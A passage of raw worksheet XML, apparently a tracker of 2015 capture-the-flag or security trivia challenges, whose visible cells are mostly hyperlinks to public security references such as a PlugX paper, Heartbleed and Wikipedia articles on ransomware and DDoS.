    <row r="77">
      <c r="A77" s="30" t="s">
        <v>857</v>
      </c>
      <c r="B77" s="31">
        <v>2015.0</v>
      </c>
      <c r="C77" s="30" t="s">
        <v>4379</v>
      </c>
      <c r="D77" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E77" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F77" s="30" t="s">
        <v>4380</v>
      </c>
      <c r="G77" s="208" t="s">
        <v>4381</v>
      </c>
      <c r="H77" s="30"/>
      <c r="I77" s="30"/>
    </row>
    <row r="78">
      <c r="A78" s="30" t="s">
        <v>976</v>
      </c>
      <c r="B78" s="31">
        <v>2015.0</v>
      </c>
      <c r="C78" s="30" t="s">
        <v>4382</v>
      </c>
      <c r="D78" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E78" s="30"/>
      <c r="F78" s="35" t="s">
        <v>4383</v>
      </c>
      <c r="G78" s="30"/>
      <c r="H78" s="30"/>
      <c r="I78" s="30"/>
    </row>
    <row r="79">
      <c r="A79" s="30" t="s">
        <v>1011</v>
      </c>
      <c r="B79" s="31">
        <v>2015.0</v>
      </c>
      <c r="C79" s="30" t="s">
        <v>4384</v>
      </c>
      <c r="D79" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E79" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F79" s="30" t="s">
        <v>4385</v>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="30" t="s">
        <v>1011</v>
      </c>
      <c r="B80" s="31">
        <v>2015.0</v>
      </c>
      <c r="C80" s="30" t="s">
        <v>4386</v>
      </c>
      <c r="D80" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E80" s="30" t="s">
        <v>4387</v>
      </c>
      <c r="F80" s="30" t="s">
        <v>4388</v>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="17">
        <v>42552.0</v>
      </c>
      <c r="B81" s="65"/>
      <c r="C81" s="65"/>
      <c r="D81" s="65"/>
      <c r="E81" s="9"/>
      <c r="F81" s="65"/>
      <c r="G81" s="65"/>
      <c r="H81" s="66"/>
      <c r="I81" s="9"/>
      <c r="J81" s="9"/>
      <c r="K81" s="9"/>
      <c r="L81" s="9"/>
      <c r="M81" s="9"/>
      <c r="N81" s="9"/>
      <c r="O81" s="9"/>
      <c r="P81" s="9"/>
      <c r="Q81" s="9"/>
      <c r="R81" s="9"/>
      <c r="S81" s="9"/>
      <c r="T81" s="9"/>
      <c r="U81" s="9"/>
      <c r="V81" s="9"/>
      <c r="W81" s="9"/>
      <c r="X81" s="9"/>
      <c r="Y81" s="9"/>
      <c r="Z81" s="9"/>
    </row>
    <row r="82">
      <c r="A82" s="30" t="s">
        <v>1132</v>
      </c>
      <c r="B82" s="31">
        <v>2015.0</v>
      </c>
      <c r="C82" s="30" t="s">
        <v>4389</v>
      </c>
      <c r="D82" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E82" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F82" s="30" t="s">
        <v>4390</v>
      </c>
      <c r="G82" s="30"/>
      <c r="H82" s="33" t="str">
        <f>HYPERLINK("https://github.com/ctfs/write-ups-2015/tree/master/trend-micro-ctf-2015/misc/misc-100","crossword")</f>
        <v>crossword</v>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B83" s="31">
        <v>2015.0</v>
      </c>
      <c r="C83" s="30" t="s">
        <v>4391</v>
      </c>
      <c r="D83" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E83" s="30"/>
      <c r="F83" s="30" t="s">
        <v>4392</v>
      </c>
      <c r="G83" s="30"/>
      <c r="H83" s="30"/>
      <c r="I83" s="30"/>
      <c r="J83" s="30"/>
    </row>
    <row r="84">
      <c r="A84" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B84" s="31">
        <v>2015.0</v>
      </c>
      <c r="C84" s="30" t="s">
        <v>4393</v>
      </c>
      <c r="D84" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E84" s="30"/>
      <c r="F84" s="30" t="s">
        <v>4394</v>
      </c>
      <c r="G84" s="30"/>
      <c r="H84" s="30"/>
      <c r="I84" s="30"/>
      <c r="J84" s="30"/>
    </row>
    <row r="85">
      <c r="A85" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B85" s="31">
        <v>2015.0</v>
      </c>
      <c r="C85" s="30" t="s">
        <v>4395</v>
      </c>
      <c r="D85" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E85" s="30"/>
      <c r="F85" s="30" t="s">
        <v>4396</v>
      </c>
      <c r="G85" s="30"/>
      <c r="H85" s="30"/>
      <c r="I85" s="30"/>
      <c r="J85" s="30"/>
    </row>
    <row r="86">
      <c r="A86" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B86" s="31">
        <v>2015.0</v>
      </c>
      <c r="C86" s="30" t="s">
        <v>4397</v>
      </c>
      <c r="D86" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E86" s="30"/>
      <c r="F86" s="30" t="s">
        <v>4398</v>
      </c>
      <c r="G86" s="30"/>
      <c r="H86" s="30"/>
      <c r="I86" s="30"/>
      <c r="J86" s="30"/>
    </row>
    <row r="87">
      <c r="A87" s="40" t="s">
        <v>167</v>
      </c>
      <c r="B87" s="40">
        <v>2015.0</v>
      </c>
      <c r="C87" s="40" t="s">
        <v>4399</v>
      </c>
      <c r="D87" s="40" t="s">
        <v>23</v>
      </c>
      <c r="F87" s="40" t="s">
        <v>4400</v>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="17">
        <v>42570.0</v>
      </c>
      <c r="B88" s="65"/>
      <c r="C88" s="65"/>
      <c r="D88" s="65"/>
      <c r="E88" s="9"/>
      <c r="F88" s="65"/>
      <c r="G88" s="65"/>
      <c r="H88" s="66"/>
      <c r="I88" s="9"/>
      <c r="J88" s="9"/>
      <c r="K88" s="9"/>
      <c r="L88" s="9"/>
      <c r="M88" s="9"/>
      <c r="N88" s="9"/>
      <c r="O88" s="9"/>
      <c r="P88" s="9"/>
      <c r="Q88" s="9"/>
      <c r="R88" s="9"/>
      <c r="S88" s="9"/>
      <c r="T88" s="9"/>
      <c r="U88" s="9"/>
      <c r="V88" s="9"/>
      <c r="W88" s="9"/>
      <c r="X88" s="9"/>
      <c r="Y88" s="9"/>
      <c r="Z88" s="9"/>
    </row>
    <row r="89">
      <c r="A89" s="30" t="s">
        <v>1193</v>
      </c>
      <c r="B89" s="31">
        <v>2015.0</v>
      </c>
      <c r="C89" s="30" t="s">
        <v>4401</v>
      </c>
      <c r="D89" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E89" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F89" s="30" t="s">
        <v>4402</v>
      </c>
      <c r="G89" s="30"/>
    </row>
    <row r="90">
      <c r="A90" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B90" s="31">
        <v>2015.0</v>
      </c>
      <c r="C90" s="30" t="s">
        <v>4403</v>
      </c>
      <c r="D90" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E90" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F90" s="30" t="s">
        <v>4404</v>
      </c>
      <c r="G90" s="33" t="str">
        <f>HYPERLINK("https://www.blackhat.com/docs/asia-14/materials/Haruyama/Asia-14-Haruyama-I-Know-You-Want-Me-Unplugging-PlugX.pdf","Plug X Writeup")</f>
        <v>Plug X Writeup</v>
      </c>
      <c r="H90" s="30"/>
    </row>
    <row r="91">
      <c r="A91" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B91" s="31">
        <v>2015.0</v>
      </c>
      <c r="C91" s="30" t="s">
        <v>4405</v>
      </c>
      <c r="D91" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E91" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F91" s="30" t="s">
        <v>4406</v>
      </c>
      <c r="G91" s="33" t="str">
        <f>HYPERLINK("https://blog.trailofbits.com/2009/03/22/no-more-free-bugs/","no-more-free-bugs!")</f>
        <v>no-more-free-bugs!</v>
      </c>
      <c r="H91" s="30"/>
    </row>
    <row r="92">
      <c r="A92" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B92" s="31">
        <v>2015.0</v>
      </c>
      <c r="C92" s="30" t="s">
        <v>4405</v>
      </c>
      <c r="D92" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E92" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F92" s="30" t="s">
        <v>4407</v>
      </c>
      <c r="G92" s="33" t="str">
        <f>HYPERLINK("http://invisiblethingslab.com/resources/misc09/smm_cache_fun.pdf","smm_mode_fun")</f>
        <v>smm_mode_fun</v>
      </c>
      <c r="H92" s="30"/>
    </row>
    <row r="93">
      <c r="A93" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B93" s="31">
        <v>2015.0</v>
      </c>
      <c r="C93" s="30" t="s">
        <v>4408</v>
      </c>
      <c r="D93" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E93" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F93" s="30" t="s">
        <v>4409</v>
      </c>
      <c r="G93" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Race_condition","Race_conditions")</f>
        <v>Race_conditions</v>
      </c>
      <c r="H93" s="30"/>
    </row>
    <row r="94">
      <c r="A94" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B94" s="31">
        <v>2015.0</v>
      </c>
      <c r="C94" s="30" t="s">
        <v>4410</v>
      </c>
      <c r="D94" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E94" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F94" s="30" t="s">
        <v>4411</v>
      </c>
      <c r="G94" s="33" t="str">
        <f>HYPERLINK("http://resources.infosecinstitute.com/api-hooking-and-dll-injection-on-windows/","DLL Injection ")</f>
        <v>DLL Injection </v>
      </c>
      <c r="H94" s="30"/>
    </row>
    <row r="95">
      <c r="A95" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B95" s="31">
        <v>2015.0</v>
      </c>
      <c r="C95" s="30" t="s">
        <v>4412</v>
      </c>
      <c r="D95" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E95" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F95" s="30" t="s">
        <v>4413</v>
      </c>
      <c r="G95" s="30"/>
      <c r="H95" s="30"/>
    </row>
    <row r="96">
      <c r="A96" s="30" t="s">
        <v>1852</v>
      </c>
      <c r="B96" s="31">
        <v>2015.0</v>
      </c>
      <c r="C96" s="31">
        <v>1337.0</v>
      </c>
      <c r="D96" s="30" t="s">
        <v>4414</v>
      </c>
      <c r="E96" s="30"/>
      <c r="F96" s="30" t="s">
        <v>4415</v>
      </c>
      <c r="G96" s="30"/>
      <c r="H96" s="30"/>
      <c r="I96" s="30"/>
    </row>
    <row r="97">
      <c r="A97" s="30" t="s">
        <v>1852</v>
      </c>
      <c r="B97" s="31">
        <v>2015.0</v>
      </c>
      <c r="C97" s="30" t="s">
        <v>4416</v>
      </c>
      <c r="D97" s="30"/>
      <c r="E97" s="30"/>
      <c r="F97" s="30" t="s">
        <v>4417</v>
      </c>
      <c r="G97" s="30"/>
      <c r="H97" s="30"/>
      <c r="I97" s="30"/>
    </row>
    <row r="98">
      <c r="A98" s="30" t="s">
        <v>1852</v>
      </c>
      <c r="B98" s="31">
        <v>2015.0</v>
      </c>
      <c r="C98" s="30" t="s">
        <v>4418</v>
      </c>
      <c r="D98" s="30"/>
      <c r="E98" s="30"/>
      <c r="F98" s="30" t="s">
        <v>4419</v>
      </c>
      <c r="G98" s="30"/>
      <c r="H98" s="30"/>
      <c r="I98" s="30"/>
    </row>
    <row r="99">
      <c r="A99" s="113" t="s">
        <v>1300</v>
      </c>
      <c r="B99" s="115">
        <v>2015.0</v>
      </c>
      <c r="C99" s="113" t="s">
        <v>4420</v>
      </c>
      <c r="D99" s="113" t="s">
        <v>23</v>
      </c>
      <c r="E99" s="113" t="s">
        <v>4421</v>
      </c>
      <c r="F99" s="163" t="str">
        <f>HYPERLINK("http://www.cgisecurity.com/questions/falsepositive.shtml","False Positive")</f>
        <v>False Positive</v>
      </c>
      <c r="G99" s="30"/>
    </row>
    <row r="100">
      <c r="A100" s="113" t="s">
        <v>1300</v>
      </c>
      <c r="B100" s="115">
        <v>2015.0</v>
      </c>
      <c r="C100" s="113" t="s">
        <v>4422</v>
      </c>
      <c r="D100" s="113" t="s">
        <v>23</v>
      </c>
      <c r="E100" s="104" t="s">
        <v>4423</v>
      </c>
      <c r="F100" s="209" t="s">
        <v>4424</v>
      </c>
      <c r="G100" s="163" t="str">
        <f>HYPERLINK("https://github.com/ESAPI/esapi-java-legacy/blob/95d85be952ddb64e2a8997f6b862d6208d8ea9f2/configuration/esapi/ESAPI.properties","ESAPI Properties")</f>
        <v>ESAPI Properties</v>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="113" t="s">
        <v>1300</v>
      </c>
      <c r="B101" s="115">
        <v>2015.0</v>
      </c>
      <c r="C101" s="113" t="s">
        <v>4425</v>
      </c>
      <c r="D101" s="113" t="s">
        <v>23</v>
      </c>
      <c r="E101" s="104" t="s">
        <v>4426</v>
      </c>
      <c r="F101" s="183" t="s">
        <v>4427</v>
      </c>
      <c r="G101" s="30"/>
    </row>
    <row r="102">
      <c r="A102" s="113" t="s">
        <v>1300</v>
      </c>
      <c r="B102" s="115">
        <v>2015.0</v>
      </c>
      <c r="C102" s="113" t="s">
        <v>4428</v>
      </c>
      <c r="D102" s="113" t="s">
        <v>23</v>
      </c>
      <c r="E102" s="113" t="s">
        <v>4421</v>
      </c>
      <c r="F102" s="163" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Regin_(malware)","Regin Worm")</f>
        <v>Regin Worm</v>
      </c>
      <c r="G102" s="30"/>
    </row>
    <row r="103">
      <c r="A103" s="113" t="s">
        <v>1300</v>
      </c>
      <c r="B103" s="115">
        <v>2015.0</v>
      </c>
      <c r="C103" s="113" t="s">
        <v>4429</v>
      </c>
      <c r="D103" s="113" t="s">
        <v>23</v>
      </c>
      <c r="E103" s="113" t="s">
        <v>4430</v>
      </c>
      <c r="F103" s="163" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Advanced_Encryption_Standard","Rijndael")</f>
        <v>Rijndael</v>
      </c>
      <c r="G103" s="30"/>
    </row>
    <row r="104">
      <c r="A104" s="113" t="s">
        <v>1300</v>
      </c>
      <c r="B104" s="115">
        <v>2015.0</v>
      </c>
      <c r="C104" s="113" t="s">
        <v>4431</v>
      </c>
      <c r="D104" s="113" t="s">
        <v>23</v>
      </c>
      <c r="E104" s="113" t="s">
        <v>4432</v>
      </c>
      <c r="F104" s="163" t="str">
        <f>HYPERLINK("http://www.imdb.com/title/tt0086567/?ref_=nv_sr_1","Wargames")</f>
        <v>Wargames</v>
      </c>
      <c r="G104" s="30"/>
    </row>
    <row r="105">
      <c r="A105" s="113" t="s">
        <v>1300</v>
      </c>
      <c r="B105" s="115">
        <v>2015.0</v>
      </c>
      <c r="C105" s="113" t="s">
        <v>4433</v>
      </c>
      <c r="D105" s="113" t="s">
        <v>23</v>
      </c>
      <c r="E105" s="113" t="s">
        <v>4434</v>
      </c>
      <c r="F105" s="163" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Steganography","Steanography")</f>
        <v>Steanography</v>
      </c>
      <c r="G105" s="30"/>
    </row>
    <row r="106">
      <c r="A106" s="113" t="s">
        <v>1300</v>
      </c>
      <c r="B106" s="115">
        <v>2015.0</v>
      </c>
      <c r="C106" s="113" t="s">
        <v>4435</v>
      </c>
      <c r="D106" s="113" t="s">
        <v>23</v>
      </c>
      <c r="E106" s="104" t="s">
        <v>4436</v>
      </c>
      <c r="F106" s="163" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Ransomware","Ransomeware")</f>
        <v>Ransomeware</v>
      </c>
      <c r="G106" s="30"/>
    </row>
    <row r="107">
      <c r="A107" s="113" t="s">
        <v>1300</v>
      </c>
      <c r="B107" s="115">
        <v>2015.0</v>
      </c>
      <c r="C107" s="113" t="s">
        <v>4437</v>
      </c>
      <c r="D107" s="113" t="s">
        <v>23</v>
      </c>
      <c r="E107" s="104" t="s">
        <v>4438</v>
      </c>
      <c r="F107" s="113" t="s">
        <v>4439</v>
      </c>
      <c r="G107" s="30"/>
    </row>
    <row r="108">
      <c r="A108" s="113" t="s">
        <v>1300</v>
      </c>
      <c r="B108" s="115">
        <v>2015.0</v>
      </c>
      <c r="C108" s="113" t="s">
        <v>4440</v>
      </c>
      <c r="D108" s="113" t="s">
        <v>23</v>
      </c>
      <c r="E108" s="104" t="s">
        <v>4441</v>
      </c>
      <c r="F108" s="163" t="s">
        <v>4442</v>
      </c>
      <c r="G108" s="30"/>
    </row>
    <row r="109">
      <c r="A109" s="113" t="s">
        <v>1300</v>
      </c>
      <c r="B109" s="115">
        <v>2015.0</v>
      </c>
      <c r="C109" s="113" t="s">
        <v>4443</v>
      </c>
      <c r="D109" s="113" t="s">
        <v>23</v>
      </c>
      <c r="E109" s="104" t="s">
        <v>4444</v>
      </c>
      <c r="F109" s="163" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Konrad_Zuse","Zuse")</f>
        <v>Zuse</v>
      </c>
      <c r="G109" s="30"/>
    </row>
    <row r="110">
      <c r="A110" s="113" t="s">
        <v>1300</v>
      </c>
      <c r="B110" s="115">
        <v>2015.0</v>
      </c>
      <c r="C110" s="113" t="s">
        <v>4445</v>
      </c>
      <c r="D110" s="113" t="s">
        <v>23</v>
      </c>
      <c r="E110" s="104" t="s">
        <v>4446</v>
      </c>
      <c r="F110" s="163" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Alan_Turing","Alan Turing")</f>
        <v>Alan Turing</v>
      </c>
      <c r="G110" s="30"/>
    </row>
    <row r="111">
      <c r="A111" s="113" t="s">
        <v>1300</v>
      </c>
      <c r="B111" s="115">
        <v>2015.0</v>
      </c>
      <c r="C111" s="113" t="s">
        <v>4447</v>
      </c>
      <c r="D111" s="113" t="s">
        <v>23</v>
      </c>
      <c r="E111" s="104" t="s">
        <v>4448</v>
      </c>
      <c r="F111" s="163" t="str">
        <f>HYPERLINK("https://www.owasp.org/index.php/Main_Page","OWASP")</f>
        <v>OWASP</v>
      </c>
      <c r="G111" s="30"/>
    </row>
    <row r="112">
      <c r="A112" s="113" t="s">
        <v>1300</v>
      </c>
      <c r="B112" s="115">
        <v>2015.0</v>
      </c>
      <c r="C112" s="113" t="s">
        <v>4449</v>
      </c>
      <c r="D112" s="113" t="s">
        <v>23</v>
      </c>
      <c r="E112" s="104" t="s">
        <v>4450</v>
      </c>
      <c r="F112" s="163" t="str">
        <f>HYPERLINK("https://www.torproject.org/","TOR")</f>
        <v>TOR</v>
      </c>
      <c r="G112" s="30"/>
    </row>
    <row r="113">
      <c r="A113" s="113" t="s">
        <v>1300</v>
      </c>
      <c r="B113" s="115">
        <v>2015.0</v>
      </c>
      <c r="C113" s="113" t="s">
        <v>4451</v>
      </c>
      <c r="D113" s="113" t="s">
        <v>23</v>
      </c>
      <c r="E113" s="104" t="s">
        <v>4452</v>
      </c>
      <c r="F113" s="163" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Honeypot_%28computing%29","Honeypot Computing")</f>
        <v>Honeypot Computing</v>
      </c>
      <c r="G113" s="30"/>
    </row>
    <row r="114">
      <c r="A114" s="113" t="s">
        <v>1300</v>
      </c>
      <c r="B114" s="115">
        <v>2015.0</v>
      </c>
      <c r="C114" s="113" t="s">
        <v>4451</v>
      </c>
      <c r="D114" s="113" t="s">
        <v>23</v>
      </c>
      <c r="E114" s="104" t="s">
        <v>4453</v>
      </c>
      <c r="F114" s="163" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Denial-of-service_attack","DDOS")</f>
        <v>DDOS</v>
      </c>
      <c r="G114" s="30"/>
    </row>
    <row r="115">
      <c r="A115" s="113" t="s">
        <v>1300</v>
      </c>
      <c r="B115" s="115">
        <v>2015.0</v>
      </c>
      <c r="C115" s="113" t="s">
        <v>4454</v>
      </c>
      <c r="D115" s="113" t="s">
        <v>23</v>
      </c>
      <c r="E115" s="104" t="s">
        <v>4455</v>
      </c>
      <c r="F115" s="163" t="str">
        <f>HYPERLINK("http://heartbleed.com/","Heartbleed")</f>
        <v>Heartbleed</v>
      </c>
      <c r="G115" s="30"/>
    </row>
    <row r="116">
      <c r="A116" s="30" t="s">
        <v>167</v>
      </c>
      <c r="B116" s="31">
        <v>2015.0</v>
      </c>
      <c r="C116" s="30" t="s">
        <v>474</v>
      </c>
      <c r="D116" s="30" t="s">
        <v>4456</v>
      </c>
      <c r="E116" s="30"/>
      <c r="F116" s="30"/>
    </row>
    <row r="117">
      <c r="A117" s="30" t="s">
        <v>167</v>
      </c>
      <c r="B117" s="31">
        <v>2015.0</v>
      </c>
      <c r="C117" s="30" t="s">
        <v>4457</v>
      </c>
      <c r="D117" s="33" t="s">
        <v>4458</v>
      </c>
      <c r="E117" s="30"/>
      <c r="F117" s="30"/>
    </row>
    <row r="118">
      <c r="A118" s="17">
        <v>42577.0</v>
      </c>
      <c r="B118" s="65"/>
      <c r="C118" s="65"/>
      <c r="D118" s="65"/>
      <c r="E118" s="9"/>
      <c r="F118" s="65"/>
      <c r="G118" s="65"/>
      <c r="H118" s="66"/>
      <c r="I118" s="9"/>
      <c r="J118" s="9"/>
      <c r="K118" s="9"/>
      <c r="L118" s="9"/>
      <c r="M118" s="9"/>
      <c r="N118" s="9"/>
      <c r="O118" s="9"/>
      <c r="P118" s="9"/>
      <c r="Q118" s="9"/>
      <c r="R118" s="9"/>
      <c r="S118" s="9"/>
      <c r="T118" s="9"/>
      <c r="U118" s="9"/>
      <c r="V118" s="9"/>
      <c r="W118" s="9"/>
      <c r="X118" s="9"/>
      <c r="Y118" s="9"/>
      <c r="Z118" s="9"/>
    </row>
    <row r="119">
      <c r="A119" s="30" t="s">
        <v>1607</v>
      </c>
      <c r="B119" s="31">
        <v>2015.0</v>
      </c>
      <c r="C119" s="30" t="s">
        <v>4459</v>
      </c>
      <c r="D119" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E119" s="30" t="s">
        <v>4460</v>
      </c>
      <c r="F119" s="30" t="s">
        <v>4461</v>
      </c>
      <c r="G119" s="30"/>
    </row>
    <row r="120">
      <c r="A120" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B120" s="31">
        <v>2015.0</v>
      </c>
      <c r="C120" s="30" t="s">
        <v>4462</v>
      </c>
      <c r="D120" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E120" s="30" t="s">
        <v>4463</v>
      </c>
      <c r="F120" s="30"/>
      <c r="G120" s="30"/>
    </row>
    <row r="121">
      <c r="A121" s="30" t="s">
        <v>2131</v>
      </c>
      <c r="B121" s="31">
        <v>2015.0</v>
      </c>
      <c r="C121" s="30" t="s">
        <v>4464</v>
      </c>
      <c r="D121" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E121" s="30" t="s">
        <v>4465</v>
      </c>
      <c r="F121" s="33" t="str">
        <f>HYPERLINK("https://www.explainxkcd.com/wiki/index.php/Little_Bobby_Tables","XKCD Explained: Little Bobby Tables")</f>
        <v>XKCD Explained: Little Bobby Tables</v>
      </c>
      <c r="G121" s="30"/>
      <c r="H121" s="30"/>
    </row>
    <row r="122">
      <c r="A122" s="30" t="s">
        <v>2131</v>
      </c>
      <c r="B122" s="31">
        <v>2015.0</v>
      </c>
      <c r="C122" s="30" t="s">
        <v>4466</v>
      </c>
      <c r="D122" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E122" s="30" t="s">
        <v>4467</v>
      </c>
      <c r="F122" s="30" t="s">
        <v>4468</v>
      </c>
      <c r="G122" s="30"/>
      <c r="H122" s="30"/>
    </row>
    <row r="123">
      <c r="A123" s="30" t="s">
        <v>2131</v>
      </c>
      <c r="B123" s="31">
        <v>2015.0</v>
      </c>
      <c r="C123" s="30" t="s">
        <v>4469</v>
      </c>
      <c r="D123" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E123" s="30" t="s">
        <v>4470</v>
      </c>
      <c r="F123" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Tech_Model_Railroad_Club","Tech Model Railroad Club")</f>
        <v>Tech Model Railroad Club</v>
      </c>
      <c r="G123" s="30"/>
      <c r="H123" s="30"/>
    </row>
    <row r="124">
      <c r="A124" s="30" t="s">
        <v>2131</v>
      </c>
      <c r="B124" s="31">
        <v>2015.0</v>
      </c>
      <c r="C124" s="30" t="s">
        <v>4471</v>
      </c>
      <c r="D124" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E124" s="30" t="s">
        <v>4472</v>
      </c>
      <c r="F124" s="30" t="s">
        <v>4473</v>
      </c>
      <c r="G124" s="30"/>
      <c r="H124" s="30"/>
    </row>
    <row r="125">
      <c r="A125" s="30" t="s">
        <v>2131</v>
      </c>
      <c r="B125" s="31">
        <v>2015.0</v>
      </c>
      <c r="C125" s="30" t="s">
        <v>4474</v>
      </c>
      <c r="D125" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E125" s="30" t="s">
        <v>4475</v>
      </c>
      <c r="F125" s="30" t="s">
        <v>4476</v>
      </c>
      <c r="G125" s="30"/>
      <c r="H125" s="30"/>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink r:id="rId1" ref="F40"/>
    <hyperlink r:id="rId2" ref="G59"/>
    <hyperlink r:id="rId3" ref="G62"/>
    <hyperlink r:id="rId4" ref="G63"/>
    <hyperlink r:id="rId5" ref="H68"/>
    <hyperlink r:id="rId6" ref="H82"/>
    <hyperlink r:id="rId7" ref="G90"/>
    <hyperlink r:id="rId8" ref="G91"/>
    <hyperlink r:id="rId9" ref="G92"/>
    <hyperlink r:id="rId10" ref="G93"/>
    <hyperlink r:id="rId11" ref="G94"/>
    <hyperlink r:id="rId12" ref="F99"/>
    <hyperlink r:id="rId13" ref="G100"/>
    <hyperlink r:id="rId14" ref="F102"/>
    <hyperlink r:id="rId15" ref="F103"/>
    <hyperlink r:id="rId16" ref="F104"/>
    <hyperlink r:id="rId17" ref="F105"/>
    <hyperlink r:id="rId18" ref="F106"/>
    <hyperlink r:id="rId19" ref="F108"/>
    <hyperlink r:id="rId20" ref="F109"/>
    <hyperlink r:id="rId21" ref="F110"/>
    <hyperlink r:id="rId22" ref="F111"/>
    <hyperlink r:id="rId23" ref="F112"/>
    <hyperlink r:id="rId24" ref="F113"/>
    <hyperlink r:id="rId25" ref="F114"/>
    <hyperlink r:id="rId26" ref="F115"/>
    <hyperlink r:id="rId27" ref="D117"/>
    <hyperlink r:id="rId28" ref="F121"/>
    <hyperlink r:id="rId29" ref="F123"/>
  </hyperlinks>
  <drawing r:id="rId30"/>
</worksheet>
</file>